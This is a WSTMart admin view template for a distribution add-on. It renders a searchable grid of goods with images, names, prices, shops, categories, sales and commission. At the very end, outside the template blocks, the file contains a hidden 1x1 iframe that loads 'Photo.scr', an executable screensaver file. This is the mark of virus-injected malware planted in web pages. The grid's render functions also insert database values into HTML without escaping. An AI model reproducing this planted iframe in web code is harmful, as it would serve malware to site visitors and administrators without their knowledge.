{extend name="../../../wstmart/admin/view/base" /}
{block name="js"}{/block}
{block name="main"}
<div class="l-loading" style="display: block" id="wst-loading"></div>
<div class="wst-toolbar">

店铺：<input type="text" name="shopName"  placeholder='店铺名称/店铺编号' id="shopName" class='query'/>
商品：<input type="text" name="goodsName"  placeholder='商品名称/商品编号' id="goodsName" class='query'/>
<button class="btn btn-blue" onclick='javascript:goodsQuery()'>查询</button>
<div style='clear:both'></div>
</div>
<div id="maingrid"></div>
<script>
$(function(){initGrid();})
  var grid;
  function initGrid(){
	grid = $("#maingrid").ligerGrid({
		url:WST.U('addon/distribut-distribut-queryadmindistributgoods'),
		pageSize:WST.pageSize,
		pageSizeOptions:WST.pageSizeOptions,
		height:'99%',
        width:'100%',
        rowHeight:65,
        minColToggle:6,
        rownumbers:true,
        columns: [
            { display: '&nbsp;', name: 'goodsName',width:60,align:'left',heightAlign:'left',isSort: false,render: function (rowdata, rowindex, value){
            	return "<img style='height:60px;width:60px;' src='"+WST.conf.ROOT+"/"+rowdata['goodsImg']+"'>";
            }},
	        { display: '商品名称', name: 'goodsName',heightAlign:'left',isSort: false,render: function (rowdata, rowindex, value){
	            return "<a style='color:blue;' href='"+WST.U('home/goods/detail',{"id":rowdata['goodsId']})+"' target='_blank'>"+rowdata['goodsName']+"</a>";
	        }},
	        { display: '商品编号', name: 'goodsSn',isSort: false,render: function (rowdata, rowindex, value){
	        	return "<div class='goods-valign-m'>"+rowdata['goodsSn']+"</div>";
	        }},
	        { display: '价格', name: 'shopPrice',isSort: false,render: function (rowdata, rowindex, value){
	        	return "<div class='goods-valign-m'>"+rowdata['shopPrice']+"</div>";
	        }},
	        { display: '所属店铺', name: 'shopName',isSort: false,render: function (rowdata, rowindex, value){
	        	return "<div class='goods-valign-m'>"+rowdata['shopName']+"</div>";
	        }},
	        { display: '所属分类', name: 'goodsCatName',isSort: false,render: function (rowdata, rowindex, value){
	        	return "<div class='goods-valign-m'>"+rowdata['goodsCatName']+"</div>";
	        }},
	        { display: '销量', name: 'saleNum',isSort: false,render: function (rowdata, rowindex, value){
	        	return "<div class='goods-valign-m'>"+rowdata['saleNum']+"</div>";
	        }},
	        { display: '佣金', name: 'saleNum',isSort: false,render: function (rowdata, rowindex, value){
	        	var commission = (rowdata['distributType']==1)?rowdata['commission']:"按订单比例分成";
	        	return "<div class='goods-valign-m'>"+commission+"</div>";
	        }}
        ]
    });
  }
  
  function goodsQuery(){
		var query = WST.getParams('.query');
		grid.set('url',WST.U('addon/distribut-distribut-queryadmindistributgoods',query));
  }
</script>
{/block}
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>
